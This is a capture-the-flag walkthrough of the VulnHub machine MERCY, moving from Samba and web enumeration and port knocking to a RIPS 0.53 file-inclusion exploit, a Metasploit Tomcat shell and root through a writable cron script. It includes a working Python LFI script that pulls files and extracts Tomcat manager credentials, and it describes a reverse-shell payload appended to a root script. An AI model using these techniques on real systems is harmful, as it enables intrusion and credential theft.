MERCY
- Layout for this exercise:
1 - INTRODUCTION
- The goal of this exercise is to develop a hacking process for the vulnerable machine MERCY.
- MERCY can be found here:
https://www.vulnhub.com/entry/digitalworldlocal-mercy,263/
- Once downloaded and imported into VirtualBox:
2 - ENUMERATION
- Discovering MERCY's IP:
- Scanning with Nmap:
- Looking more closely at port 8080 (HTTP), the service banner identifies Apache Tomcat with the Coyote JSP engine 1.1:
- Dirbusting the web server at port 8080:
- So we have some interesting paths to explore: robots.txt, /tryharder/tryharder and /manager.
- Connecting with the browser:
- Reading robots.txt:
- Checking folder /tryharder/tryharder we find a string encoded with Base64:
- Decoding:
- The message suggests that some user might be using the password "password".
- Going to /manager:
- Port 445 is also open, so we enumerate the Samba server with enum4linux:
- There are 4 local users: pleadformercy, qiu, thisisasuperduperlonguser and fluffy.
- Launching Hydra against the Samba server with a text file of those usernames and the rockyou.txt wordlist:
- Connecting to the Samba server with the credentials qiu:password (remembering the Base64 decoded string):
- Listing contents:
- Getting .bash_history:
- Going to folder .private:
- Getting readme.txt:
- Going to secrets, there is nothing inside:
- Going to folder opensesame and getting configprint and config:
- Reading .bash_history:
- Reading readme.txt:
- Reading configprint, there are a lot of references to config:
- Reading config, we find information about two filtered services, HTTP on port 80 and SSH on port 22:
- Indeed, nmap reports both ports 22 and 80 as filtered:
- Because config quotes several port sequences, the knock command must be used to open the filtered services; for instance, HTTP on port 80:
- The same for SSH on port 22:
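- To show what the knock step actually does, here is an added example (not code from the original write-up, nor from knockd or the knock client) that parses a knockd-style configuration like the one config resembles, replays a sequence against the host, and then checks whether the protected port has opened. The configuration text, the sequences and the host address are constructed for illustration; MERCY's real sequences are not reproduced here.

```python
"""Port-knocking helper: parse knockd-style sections, replay a sequence, test the result.
Added example; the sample configuration and host are assumptions, not MERCY's real values."""
import re
import socket

# Constructed sample in knockd.conf syntax (sequences are NOT the ones on MERCY).
SAMPLE_CONFIG = """
[options]
    UseSyslog

[openHTTP]
    sequence    = 7000,8000,9000
    seq_timeout = 5
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
    tcpflags    = syn

[openSSH]
    sequence    = 1111:tcp,2222:udp,3333:tcp
    seq_timeout = 5
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn
"""


def parse_knockd_config(text):
    """Return {section: {'sequence': [(port, proto), ...], 'dport': int | None}}.

    Sections without a 'sequence' key (such as [options]) are dropped. The
    protected port is recovered from the '--dport N' fragment of the command,
    when present, so the caller knows what to test afterwards."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        header = re.match(r'\[(.+)\]$', line)
        if header:
            current = header.group(1)
            sections[current] = {'sequence': [], 'dport': None}
            continue
        if current is None or '=' not in line:
            continue
        key, value = (part.strip() for part in line.split('=', 1))
        if key == 'sequence':
            seq = []
            for item in value.split(','):
                port, _, proto = item.strip().partition(':')
                seq.append((int(port), (proto or 'tcp').lower()))  # knockd defaults to tcp
            sections[current]['sequence'] = seq
        elif key == 'command':
            dport = re.search(r'--dport\s+(\d+)', value)
            if dport:
                sections[current]['dport'] = int(dport.group(1))
    return {name: rule for name, rule in sections.items() if rule['sequence']}


def knock(host, sequence, timeout=0.3):
    """Replay the sequence: one TCP connection attempt or one UDP datagram per port.

    The knock ports are normally closed or filtered, so the TCP attempts fail;
    that is fine, the daemon only watches for the incoming SYN."""
    for port, proto in sequence:
        if proto == 'udp':
            with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
                s.sendto(b'', (host, port))
        else:
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(timeout)
                try:
                    s.connect((host, port))
                except OSError:
                    pass


def port_is_open(host, port, timeout=1.0):
    """True when a TCP connection to host:port succeeds."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return True
        except OSError:
            return False


if __name__ == '__main__':
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else '127.0.0.1'  # MERCY's address is an assumption
    for name, rule in parse_knockd_config(SAMPLE_CONFIG).items():
        knock(target, rule['sequence'])
        if rule['dport'] is not None:
            state = 'open' if port_is_open(target, rule['dport']) else 'closed/filtered'
            print(f"{name}: knocked {rule['sequence']}, port {rule['dport']} is {state}")
```

- Run it as `python3 knock.py <target>`; with the real sequences from config substituted into SAMPLE_CONFIG it performs the same action as `knock <target> <seq>` followed by an nmap check of the port. A short connect timeout matters: knockd enforces seq_timeout between knocks, and a long hang on a filtered port can make the whole sequence expire.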
- Now, connection with the browser is available:
- Dirbusting port 80:
- Reading robots.txt we discover two additional folders: /mercy and /nomercy:
- Going to /mercy:
- Going to /nomercy, we find the RIPS 0.53 application running:
3 - EXPLOITATION
- Searching for RIPS exploits, we find a Multiple Local File Inclusion (LFI) exploit:
- Reading 18660.txt:
- Applying the LFI to /etc/passwd:
- However, it doesn't work with /etc/shadow:
- Remembering that Tomcat keeps its manager credentials in a tomcat-users.xml file:
- Extracting tomcat-users.xml:
- The last lines give valuable information: two usernames with their corresponding passwords and roles:
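- The same extraction, as an added example that is not code from the original write-up or from RIPS: build the LFI request, strip the HTML that the RIPS viewer wraps around the included file, and parse the recovered tomcat-users.xml for accounts that can use the manager application. The vulnerable script and parameter (windows/code.php?file=) follow the RIPS 0.53 advisory the write-up found (EDB-ID 18660); the host, base path and sample XML are assumptions, and the exact markup RIPS emits around the file is also assumed, so strip_html is best effort.

```python
"""Pull a file through the RIPS 0.53 LFI and mine tomcat-users.xml for manager credentials.
Added example; host, base path and the sample XML are constructed."""
import html
import re
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET

# Constructed sample; the real MERCY file is not reproduced here.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <!-- constructed sample -->
  <role rolename="manager-gui"/>
  <role rolename="admin-gui"/>
  <user username="alice" password="s3cret" roles="manager-gui,admin-gui"/>
  <user username="bob" password="hunter2" roles="admin-gui"/>
</tomcat-users>
"""

# Roles that let an account deploy a WAR through the manager app
# (HTML interface and text/script interface respectively).
DEPLOY_ROLES = {'manager-gui', 'manager-script'}


def lfi_url(base, target_path):
    """Build the LFI request. base is e.g. 'http://10.0.0.5/nomercy' (assumed address)."""
    return base.rstrip('/') + '/windows/code.php?' + urllib.parse.urlencode({'file': target_path})


def strip_html(body):
    """Best effort: drop the viewer's tags, turn <br> into newlines, unescape entities.
    Tags are removed before unescaping so that '&lt;user&gt;' in the file survives."""
    text = re.sub(r'<br\s*/?>', '\n', body, flags=re.I)
    text = re.sub(r'<[^>]+>', '', text)
    return html.unescape(text)


def fetch_via_lfi(base, target_path, timeout=10):
    """Fetch target_path through the LFI and return its text (network call, not run offline)."""
    with urllib.request.urlopen(lfi_url(base, target_path), timeout=timeout) as resp:
        return strip_html(resp.read().decode('utf-8', 'replace'))


def parse_tomcat_users(xml_text):
    """Return {username: {'password': str, 'roles': [..]}} from tomcat-users.xml."""
    users = {}
    for el in ET.fromstring(xml_text).iter():
        tag = el.tag.rsplit('}', 1)[-1]          # tolerate the tomcat xmlns
        if tag != 'user':
            continue
        name = el.get('username') or el.get('name')
        roles = [r.strip() for r in (el.get('roles') or '').split(',') if r.strip()]
        users[name] = {'password': el.get('password'), 'roles': roles}
    return users


def deploy_capable(users):
    """Usernames whose roles allow deploying a WAR via /manager."""
    return sorted(u for u, info in users.items() if DEPLOY_ROLES & set(info['roles']))


if __name__ == '__main__':
    import sys
    base = sys.argv[1] if len(sys.argv) > 1 else 'http://10.0.0.5/nomercy'  # assumed
    # On a live target this would be the output of fetch_via_lfi(base, '/path/to/tomcat-users.xml');
    # the real location of the file on MERCY is not reproduced here.
    users = parse_tomcat_users(SAMPLE_TOMCAT_USERS)
    for name in deploy_capable(users):
        print(f"{name}:{users[name]['password']} roles={users[name]['roles']}")
```

- Only manager-gui and manager-script are counted as deploy-capable; admin-gui alone lets an account edit hosts and contexts but not upload a WAR, which is what the Metasploit step that follows relies on.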
4 - GETTING A SHELL WITH METASPLOIT
- Launching Metasploit:
- Using this exploit for Tomcat:
- Setting options and running the exploit we get a Meterpreter session:
- Spawning a shell from Meterpreter and upgrading it to an interactive TTY:
5 - PRIVILEGE ESCALATION
- Switching user with the credentials fluffy:freakishfluffybunny:
- Unfortunately, fluffy cannot run anything with sudo:
- Upgrading fluffy's shell to an interactive TTY:
- Walking through the home folders and files until something useful turns up:
- Finally, timeclock looks interesting: it is a root-owned script that we can write to:
- Creating a reverse-shell payload with msfvenom:
- Setting up a Netcat listener:
- Appending the payload to timeclock:
- After a few minutes the script is executed as root and we get a root shell:
6 - CAPTURING THE FLAG
- Reading proof.txt: